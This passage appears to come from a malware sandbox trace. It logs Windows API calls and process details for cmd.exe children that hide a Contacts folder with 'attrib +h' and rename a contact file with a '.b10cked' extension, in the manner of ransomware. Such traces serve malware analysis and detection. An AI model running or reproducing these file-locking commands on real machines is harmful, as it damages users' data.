| out: lpAttributeList=0x2cf37c) [0209.582] GetConsoleTitleW (in: lpConsoleTitle=0x2cf760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.582] GetEnvironmentVariableW (in: lpName="PATH", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.582] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.583] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.583] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.583] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0209.583] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0209.583] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.583] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf37c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf444 | out: lpAttributeList=0x2cf37c, lpSize=0x2cf444) returned 1 [0209.583] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf37c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf43c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf37c, lpPreviousValue=0x0) returned 1 [0209.583] GetStartupInfoW (in: lpStartupInfo=0x2cf338 | out: lpStartupInfo=0x2cf338*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0209.583] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.583] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, 
dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf3d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Contacts\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf424 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessInformation=0x2cf424*(hProcess=0x50, hThread=0x4c, dwProcessId=0x828, dwThreadId=0x8c4)) returned 1 [0209.586] CloseHandle (hObject=0x4c) returned 1 [0209.586] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.586] GetEnvironmentStringsW () returned 0x443628* [0209.586] FreeEnvironmentStringsW (penv=0x443628) returned 1 [0209.586] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0210.001] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf318 | out: lpExitCode=0x2cf318*=0x0) returned 1 [0210.001] CloseHandle (hObject=0x50) returned 1 [0210.001] _vsnwprintf (in: _Buffer=0x2cf460, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf324 | out: _Buffer="00000000") returned 8 [0210.001] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0210.001] GetEnvironmentStringsW () returned 0x443628* [0210.001] FreeEnvironmentStringsW (penv=0x443628) returned 1 [0210.001] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.001] GetEnvironmentStringsW () returned 0x443628* [0210.001] FreeEnvironmentStringsW (penv=0x443628) returned 1 [0210.001] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf37c | out: lpAttributeList=0x2cf37c) [0210.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.001] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.002] GetConsoleMode 
(in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.002] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.002] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.002] SetConsoleInputExeNameW () returned 0x1 [0210.002] GetConsoleOutputCP () returned 0x1b5 [0210.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.002] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.002] exit (_Code=0) Process: id = "508" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f20" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30774 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30775 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30776 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30777 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" 
filename = "" Region: id = 30778 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30779 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30780 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30781 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30782 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 30783 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30804 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30805 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30806 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 30807 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30808 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 
30809 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30810 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30811 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30812 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30813 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30814 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30815 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30816 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30817 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30818 start_va 
= 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 30819 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30820 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30821 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30822 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30823 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30824 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30825 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 30826 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 30827 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 707 os_tid = 0xc4 [0208.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8a4 | out: lpSystemTimeAsFileTime=0x18f8a4*(dwLowDateTime=0xb12d1740, dwHighDateTime=0x1d440a9)) [0208.646] GetCurrentProcessId () returned 0xe54 [0208.646] GetCurrentThreadId () returned 0xc4 [0208.646] GetTickCount () returned 0x3aa61 [0208.646] 
QueryPerformanceCounter (in: lpPerformanceCount=0x18f89c | out: lpPerformanceCount=0x18f89c*=26543542493) returned 1 [0208.647] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0208.647] __set_app_type (_Type=0x1) [0208.647] __p__fmode () returned 0x76b331f4 [0208.647] __p__commode () returned 0x76b331fc [0208.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0208.647] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0208.647] GetCurrentThreadId () returned 0xc4 [0208.647] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc4) returned 0x38 [0208.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.647] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0208.647] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.647] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.647] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f834 | out: phkResult=0x18f834*=0x0) returned 0x2 [0208.648] VirtualQuery (in: lpAddress=0x18f86b, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, 
RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.648] GetConsoleOutputCP () returned 0x1b5 [0208.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.648] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0208.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0208.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0208.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0208.648] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.648] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0208.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.649] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0208.649] GetEnvironmentStringsW () returned 0x1a0180* [0208.649] FreeEnvironmentStringsW (penv=0x1a0180) returned 1 [0208.649] GetEnvironmentStringsW () returned 0x1a0180* [0208.649] FreeEnvironmentStringsW (penv=0x1a0180) returned 1 [0208.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7a4 | out: phkResult=0x18e7a4*=0x40) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0xa8, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegCloseKey (hKey=0x40) returned 0x0 [0208.649] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7a4 | out: phkResult=0x18e7a4*=0x40) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7ac, 
lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.650] RegCloseKey (hKey=0x40) returned 0x0 [0208.650] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863aa [0208.650] srand (_Seed=0x5b8863aa) [0208.650] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"" [0208.650] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C 
move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"" [0208.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.650] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0208.650] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0208.650] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.650] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.650] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0208.650] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0208.650] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0208.650] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0208.650] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0208.650] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0208.650] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0208.650] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0208.650] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0208.651] GetEnvironmentStringsW () returned 0x1a22d0* [0208.651] FreeEnvironmentStringsW (penv=0x1a22d0) returned 1 [0208.651] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.651] GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.651] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0208.651] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0208.651] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0208.651] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0208.651] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0208.651] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0208.651] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0208.651] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0208.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.651] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f570, lpFilePart=0x18f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f56c*="Desktop") returned 0x18 [0208.651] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.651] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec) returned 0x1a0010 [0208.651] FindClose (in: hFindFile=0x1a0010 | out: hFindFile=0x1a0010) returned 1 [0208.652] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec) returned 0x1a0010 [0208.652] FindClose (in: hFindFile=0x1a0010 | out: hFindFile=0x1a0010) returned 1 [0208.652] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec) returned 0x1a0010 [0208.652] FindClose (in: hFindFile=0x1a0010 | out: hFindFile=0x1a0010) returned 1 [0208.652] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.652] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0208.652] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0208.652] GetEnvironmentStringsW () returned 0x1a2af0* [0208.652] FreeEnvironmentStringsW (penv=0x1a2af0) returned 1 [0208.652] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.653] GetConsoleOutputCP () returned 0x1b5 [0208.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.653] GetUserDefaultLCID () returned 0x409 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="0") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="0") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="1") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0208.653] GetLocaleInfoW (in: 
